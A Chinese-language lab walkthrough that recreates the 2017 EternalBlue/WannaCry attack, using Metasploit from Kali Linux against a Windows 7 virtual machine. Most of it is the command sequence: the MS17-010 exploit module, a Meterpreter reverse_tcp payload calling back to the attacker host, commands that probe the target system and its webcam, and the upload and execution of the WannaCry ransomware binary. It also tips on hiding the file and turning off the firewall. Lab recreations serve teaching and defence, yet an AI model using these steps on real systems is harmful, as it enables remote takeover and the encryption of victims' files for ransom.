“永恒之蓝”渗透还原

一、背景

    2017年5月12日起，全球范围内爆发的基于Windows网络共享协议进行攻击传播的蠕虫恶意代码，不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。

二、攻击方式

    恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

三、攻击还原

    1、环境准备

   （1）虚拟机：在物理机上安装虚拟机，本还原过程使用vmware

workstationVMware® Workstation 12 Pro,版本号为12.5.0

build-4352439。没有软件的同学网上找就是行了。

   （2）操作系统：在虚拟机中打开安装好两个操作系统，一台为64位，windows 7旗舰版，一台为kali linux。

   （3）探测攻击目标：以kali linux作为攻击点对window 7进行攻击，首先确定win 7攻击目标存在，假设我们预先知道win7IP地址如下：

在kali linux中，使用如下命令进行检查，并确定ms 17010漏洞存在：

   2、攻击部署

    （1）启动postgresql 服务，为了加快search命令的查询速度而已

         (命令)servive postgresql start

（2）进入msf接口或者说控制台,msf的系统文件和用户文件位于/usr/share/metasploit-framework/msfconsole目录下。

   （命令）msfconsole

（3） 调用漏洞模块，并查看该模块的使用参数

（命令）use exploit/windows/smb/ms17_010_eternalblue

（命令）：options

(4)通过参数指定攻击目标：

（命令）set RHOST 192.168.1.17

(5)设置攻击负载(攻击载荷是针对特定平台的一段攻击代码，它通过网络传送到攻击目标进行执行)

（命令）set payload windows/x64/meterpreter/reverse_tcp

(6)设定监听主机（发动攻击的主机）

  (命令) set LHOST 192.168.1.18

(7)查看配置情况

(命令) show options

3、正式攻击

（1）发起攻击

     (命令) exploit

z

（2）获取系统重要信息

      (用户ID:命令)getuid

    (扫描是否有摄像头:命令)webcam_list

    (查询路由:命令)route

（3）上传勒索文件至C盘根目录下，为了隐蔽可以传至更隐蔽目录

（命令）upload wcry/wcry.exe c:\

（命令）upload wcry/FILE_ID.DIZ c:\

（4）执行勒索可执行文件即可

（命令）execute  -f c:\wcry.exe

    至此，勒索成功…………………………………………………………

四、FAQ

(1)攻击未成功，看提示说明没有连接上win7.................

解决办法：关闭win7防火墙即可！！！

（2）查看帮助，按照思路进行上传病毒文档

五、总结

   通过这次渗透还原“永恒之蓝”勒索Win7实验，事实证明我们要攻击目标，首先就是找到目标，利用端口扫描等各种分析工具，对目标进行全面，确认是否有漏洞，比如弱密码，开放端口，权限机制缺失等，进而具体针对攻击，以达成目的！！！